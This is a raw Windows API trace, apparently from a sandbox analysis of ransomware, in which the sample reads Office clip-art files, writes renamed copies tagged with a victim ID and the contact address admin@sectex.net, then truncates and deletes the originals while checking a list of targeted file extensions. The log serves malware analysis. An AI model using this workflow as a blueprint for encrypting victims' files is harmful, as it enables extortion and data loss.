	[0162.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107488.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0162.193] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.193] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107488.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0162.193] GetLastError () returned 0x0
	[0162.193] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1f40, lpOverlapped=0x0) returned 1
	[0162.443] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1f50, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1f50, lpOverlapped=0x0) returned 1
	[0162.444] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.444] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.445] SetEndOfFile (hFile=0x3d0) returned 1
	[0162.445] CloseHandle (hObject=0x3d0) returned 1
	[0162.445] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.445] SetEndOfFile (hFile=0x388) returned 1
	[0162.447] CloseHandle (hObject=0x388) returned 1
	[0162.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.448] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107488.wmf")) returned 1
	[0162.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 63
	[0162.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 63
	[0162.449] lstrlenW (lpString=".doc") returned 4
	[0162.449] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.449] lstrlenW (lpString=".docx") returned 5
	[0162.449] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0162.449] lstrlenW (lpString=".pdf") returned 4
	[0162.449] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.449] lstrlenW (lpString=".xls") returned 4
	[0162.449] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.449] lstrlenW (lpString=".xlsx") returned 5
	[0162.449] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0162.449] lstrlenW (lpString=".ppt") returned 4
	[0162.449] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 63
	[0162.449] lstrlenW (lpString=".zip") returned 4
	[0162.450] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.450] lstrlenW (lpString=".rar") returned 4
	[0162.450] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.450] lstrlenW (lpString=".bz2") returned 4
	[0162.450] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.450] lstrlenW (lpString=".7z") returned 3
	[0162.450] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 63
	[0162.450] lstrlenW (lpString=".dbf") returned 4
	[0162.450] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 63
	[0162.450] lstrlenW (lpString=".1cd") returned 4
	[0162.450] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 63
	[0162.450] lstrlenW (lpString=".jpg") returned 4
	[0162.450] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 63
	[0162.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 63
	[0162.450] lstrlenW (lpString=".doc") returned 4
	[0162.450] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.450] lstrlenW (lpString=".docx") returned 5
	[0162.450] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0162.450] lstrlenW (lpString=".pdf") returned 4
	[0162.450] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.450] lstrlenW (lpString=".xls") returned 4
	[0162.450] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.451] lstrlenW (lpString=".xlsx") returned 5
	[0162.451] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0162.451] lstrlenW (lpString=".ppt") returned 4
	[0162.451] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 63
	[0162.451] lstrlenW (lpString=".zip") returned 4
	[0162.451] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.451] lstrlenW (lpString=".rar") returned 4
	[0162.451] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.451] lstrlenW (lpString=".bz2") returned 4
	[0162.451] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.451] lstrlenW (lpString=".7z") returned 3
	[0162.451] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 63
	[0162.451] lstrlenW (lpString=".dbf") returned 4
	[0162.451] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 63
	[0162.451] lstrlenW (lpString=".1cd") returned 4
	[0162.451] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 63
	[0162.451] lstrlenW (lpString=".jpg") returned 4
	[0162.451] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.451] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.451] lstrlenW (lpString="J0107516.WMF") returned 12
	[0162.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107516.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0162.500] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=14008) returned 1
	[0162.500] CloseHandle (hObject=0x37c) returned 1
	[0162.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107516.wmf")) returned 0x20
	[0162.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107516.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107516.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0162.500] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.501] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107516.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0162.524] GetLastError () returned 0x0
	[0162.524] ReadFile (in: hFile=0x37c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x36b8, lpOverlapped=0x0) returned 1
	[0162.555] WriteFile (in: hFile=0x388, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x36c0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x36c0, lpOverlapped=0x0) returned 1
	[0162.556] ReadFile (in: hFile=0x37c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.556] WriteFile (in: hFile=0x388, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.556] SetEndOfFile (hFile=0x388) returned 1
	[0162.912] CloseHandle (hObject=0x388) returned 1
	[0162.912] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.912] SetEndOfFile (hFile=0x37c) returned 1
	[0162.915] CloseHandle (hObject=0x37c) returned 1
	[0162.915] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.046] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107516.wmf")) returned 1
	[0163.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned 63
	[0163.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned 63
	[0163.163] lstrlenW (lpString=".doc") returned 4
	[0163.163] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.163] lstrlenW (lpString=".docx") returned 5
	[0163.163] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0163.163] lstrlenW (lpString=".pdf") returned 4
	[0163.163] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.163] lstrlenW (lpString=".xls") returned 4
	[0163.163] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.163] lstrlenW (lpString=".xlsx") returned 5
	[0163.163] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0163.163] lstrlenW (lpString=".ppt") returned 4
	[0163.163] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned 63
	[0163.163] lstrlenW (lpString=".zip") returned 4
	[0163.163] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.163] lstrlenW (lpString=".rar") returned 4
	[0163.163] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.163] lstrlenW (lpString=".bz2") returned 4
	[0163.163] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.163] lstrlenW (lpString=".7z") returned 3
	[0163.163] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned 63
	[0163.163] lstrlenW (lpString=".dbf") returned 4
	[0163.163] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned 63
	[0163.163] lstrlenW (lpString=".1cd") returned 4
	[0163.164] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned 63
	[0163.164] lstrlenW (lpString=".jpg") returned 4
	[0163.164] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned 63
	[0163.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned 63
	[0163.164] lstrlenW (lpString=".doc") returned 4
	[0163.164] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.164] lstrlenW (lpString=".docx") returned 5
	[0163.164] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0163.164] lstrlenW (lpString=".pdf") returned 4
	[0163.164] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.164] lstrlenW (lpString=".xls") returned 4
	[0163.164] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.164] lstrlenW (lpString=".xlsx") returned 5
	[0163.164] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0163.164] lstrlenW (lpString=".ppt") returned 4
	[0163.164] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned 63
	[0163.164] lstrlenW (lpString=".zip") returned 4
	[0163.164] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.164] lstrlenW (lpString=".rar") returned 4
	[0163.164] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.164] lstrlenW (lpString=".bz2") returned 4
	[0163.164] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.164] lstrlenW (lpString=".7z") returned 3
	[0163.164] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned 63
	[0163.164] lstrlenW (lpString=".dbf") returned 4
	[0163.164] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned 63
	[0163.164] lstrlenW (lpString=".1cd") returned 4
	[0163.164] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned 63
	[0163.165] lstrlenW (lpString=".jpg") returned 4
	[0163.165] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.165] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.165] lstrlenW (lpString="J0107750.WMF") returned 12
	[0163.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107750.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.165] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=4716) returned 1
	[0163.165] CloseHandle (hObject=0x3c4) returned 1
	[0163.165] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107750.wmf")) returned 0x20
	[0163.166] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107750.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107750.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.166] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.166] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107750.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0163.167] GetLastError () returned 0x0
	[0163.167] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x126c, lpOverlapped=0x0) returned 1
	[0163.185] WriteFile (in: hFile=0x1d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1270, lpOverlapped=0x0) returned 1
	[0163.185] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.185] WriteFile (in: hFile=0x1d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.186] SetEndOfFile (hFile=0x1d8) returned 1
	[0163.186] CloseHandle (hObject=0x1d8) returned 1
	[0163.186] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.186] SetEndOfFile (hFile=0x3c4) returned 1
	[0163.188] CloseHandle (hObject=0x3c4) returned 1
	[0163.188] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.188] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107750.wmf")) returned 1
	[0163.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned 63
	[0163.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned 63
	[0163.189] lstrlenW (lpString=".doc") returned 4
	[0163.189] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.189] lstrlenW (lpString=".docx") returned 5
	[0163.189] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0163.189] lstrlenW (lpString=".pdf") returned 4
	[0163.189] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.189] lstrlenW (lpString=".xls") returned 4
	[0163.189] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.189] lstrlenW (lpString=".xlsx") returned 5
	[0163.189] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0163.189] lstrlenW (lpString=".ppt") returned 4
	[0163.189] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned 63
	[0163.189] lstrlenW (lpString=".zip") returned 4
	[0163.189] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.189] lstrlenW (lpString=".rar") returned 4
	[0163.189] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.189] lstrlenW (lpString=".bz2") returned 4
	[0163.189] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.189] lstrlenW (lpString=".7z") returned 3
	[0163.189] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned 63
	[0163.189] lstrlenW (lpString=".dbf") returned 4
	[0163.190] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned 63
	[0163.190] lstrlenW (lpString=".1cd") returned 4
	[0163.190] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned 63
	[0163.190] lstrlenW (lpString=".jpg") returned 4
	[0163.190] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned 63
	[0163.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned 63
	[0163.190] lstrlenW (lpString=".doc") returned 4
	[0163.190] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.190] lstrlenW (lpString=".docx") returned 5
	[0163.190] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0163.190] lstrlenW (lpString=".pdf") returned 4
	[0163.190] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.190] lstrlenW (lpString=".xls") returned 4
	[0163.190] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.190] lstrlenW (lpString=".xlsx") returned 5
	[0163.190] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0163.190] lstrlenW (lpString=".ppt") returned 4
	[0163.190] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned 63
	[0163.190] lstrlenW (lpString=".zip") returned 4
	[0163.190] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.190] lstrlenW (lpString=".rar") returned 4
	[0163.190] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.190] lstrlenW (lpString=".bz2") returned 4
	[0163.190] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.190] lstrlenW (lpString=".7z") returned 3
	[0163.190] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned 63
	[0163.190] lstrlenW (lpString=".dbf") returned 4
	[0163.190] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned 63
	[0163.190] lstrlenW (lpString=".1cd") returned 4
	[0163.191] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned 63
	[0163.191] lstrlenW (lpString=".jpg") returned 4
	[0163.191] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.191] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.191] lstrlenW (lpString="J0144773.JPG") returned 12
	[0163.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0144773.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.192] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=40231) returned 1
	[0163.192] CloseHandle (hObject=0x3c4) returned 1
	[0163.192] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0144773.jpg")) returned 0x20
	[0163.192] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0144773.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0144773.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
